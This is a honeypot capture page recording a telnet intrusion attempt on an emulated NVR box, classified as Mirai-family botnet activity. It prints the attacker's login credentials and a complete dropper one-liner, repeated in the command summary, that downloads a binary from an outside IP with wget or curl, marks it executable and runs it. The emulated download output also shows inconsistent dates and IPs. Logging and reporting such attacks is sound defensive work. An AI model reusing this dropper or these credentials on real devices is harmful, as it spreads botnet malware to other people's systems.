HoneyMire Hub

Attack #6226 telnet

Captured 2026-05-11 17:05:42Z by Ka on honeypot HoneyMistNano 🟡 C3 SuperMini · firmware 1.

Session recording

Transcript

Server output and attacker input as captured, line-grain. The asciicast above is the cinematic version of the same data; everything below is the raw conversation. Captured credentials live in the Credentials card; this transcript starts where the shell session does.

Welcome to HiLinux (NVR Box)

hilinux-nvrbox login: rapport

Password: r@p8p0r+

BusyBox v1.20.2 (2015-04-01 10:23:44 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

hilinux-nvrbox# start
sh: start: not found
hilinux-nvrbox# enable
sh: enable: not found
hilinux-nvrbox# config terminal
sh: config: not found
hilinux-nvrbox# system
sh: system: not found
hilinux-nvrbox# linuxshell
sh: linuxshell: not found
hilinux-nvrbox# su
sh: su: not found
hilinux-nvrbox# shell
sh: shell: not found
hilinux-nvrbox# sh
hilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x54\x53\x54\x42\x46\x51'
cd: can't cd to /usr: No such file or directory
TSTBFQ
hilinux-nvrbox# /bin/busybox wget;/bin/busybox echo -ne '\x54\x53\x54\x42\x46\x51'
BusyBox v1.20.2 (2015-04-01 10:23:44 CST) multi-call binary.

Usage: wget [-cq] [-O FILE] [--header 'HEADER: VALUE'] URL
TSTBFQhilinux-nvrbox# >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://113.238.123.78:33070/i ||curl -O http://113.238.123.78:33070/i ||/bin/busybox wget http://113.238.123.78:33070/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x58\x41\x43\x53\x52\x56\x55\x41'
cd: can't cd to /usr: No such file or directory
Connecting to http://113.238.123.78:33070/i
Connecting to http://113.238.123.78:33070/i (45.207.70.41:30700)
saving to STDOUT

            0K .......... 100%  1234K=0.1s

2025-01-09 00:56:19 (1234 KB/s) - saved [1234567]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  1234K  100  1234K    0     0   1234K      0  0:00:01 --:--:--  0:00:01 1234K
Connecting to http://113.238.123.78:33070/i
Connecting to http://113.238.123.78:33070/i (255.63.43.241:55108)
saving to STDOUT

            0K .......... 100%  1234K=0.1s

2025-06-27 06:29:32 (1234 KB/s) - saved [1234567]
sh: (cp: not found
cat: i>ii: No such file or directory
sh: ./i: not found
XACSRVUA
hilinux-nvrbox# 

Credentials

Username: rapport

Password: r@p8p0r+

1 login attempt(s) before disconnect.

Geolocation hub-resolved

🇷🇺Russia · Tyumen Oblast · Tyumen

MKS75 Network · AS8359 MTS PJSC · 57.15,65.54

Behavioral classification

🦠 95% confidence

Mirai-family IoT botnet — wget + chmod + exec; tries common router/IP-cam credentials.

Command summary

start
enable
config terminal
system
linuxshell
su
shell
sh
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '\x54\x53\x54\x42\x46\x51'
/bin/busybox wget;/bin/busybox echo -ne '\x54\x53\x54\x42\x46\x51'
>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://113.238.123.78:33070/i ||curl -O http://113.238.123.78:33070/i ||/bin/busybox wget http://113.238.123.78:33070/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '\x58\x41\x43\x53\x52\x56\x55\x41'

Reported to threat intel

AlienVault OTX ✓